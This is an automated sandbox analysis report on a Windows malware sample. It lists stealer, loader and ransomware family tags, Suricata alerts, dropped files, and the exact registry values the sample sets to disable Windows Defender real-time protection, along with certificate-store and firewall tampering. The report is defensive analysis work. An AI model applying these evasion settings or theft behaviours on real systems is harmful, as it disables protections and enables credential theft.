Malware Analysis Report

2024-10-19 02:08

Sample ID 220705-m3l6rsgdeq
Target faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z
SHA256 fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d
Tags
privateloader redline vidar 1448 222 argynpenisx2 mount2 ruzkii evasion infostealer loader main pyinstaller spyware stealer suricata trojan upx amadey colibri djvu glupteba 937 lyla28.06 collection discovery dropper persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d

Threat Level: Known bad

The file faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z was found to be: Known bad.

Malicious Activity Summary

privateloader redline vidar 1448 222 argynpenisx2 mount2 ruzkii evasion infostealer loader main pyinstaller spyware stealer suricata trojan upx amadey colibri djvu glupteba 937 lyla28.06 collection discovery dropper persistence ransomware

Modifies Windows Defender Real-time Protection settings

suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

suricata: ET MALWARE Win32/Colibri Loader Activity M2

suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

Djvu Ransomware

PrivateLoader

suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

suricata: ET MALWARE Amadey CnC Check-In

Modifies visiblity of hidden/system files in Explorer

Glupteba

Modifies visibility of file extensions in Explorer

Process spawned unexpected child process

suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

RedLine Payload

suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Amadey

Colibri Loader

suricata: ET MALWARE Win32/Colibri Loader Activity M3

suricata: ET MALWARE Win32/Colibri Loader Activity

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata: ET MALWARE Generic gate .php GET with minimal headers

Detected Djvu ransomware

suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

Vidar

Vidar Stealer

Blocklisted process makes network request

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

UPX packed file

Reads user/profile data of web browsers

Checks computer location settings

Reads local data of messenger clients

Uses the VBS compiler for execution

Reads user/profile data of local email clients

Checks BIOS information in registry

Loads dropped DLL

Modifies file permissions

Adds Run key to start application

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Detects Pyinstaller

Enumerates physical storage devices

Program crash

Modifies system certificate store

Script User-Agent

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Runs ping.exe

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

outlook_win_path

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Kills process with taskkill

Modifies registry class

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-07-05 10:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-05 10:59

Reported

2022-07-05 11:06

Platform

win7-20220414-en

Max time kernel

157s

Max time network

393s

Command Line

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
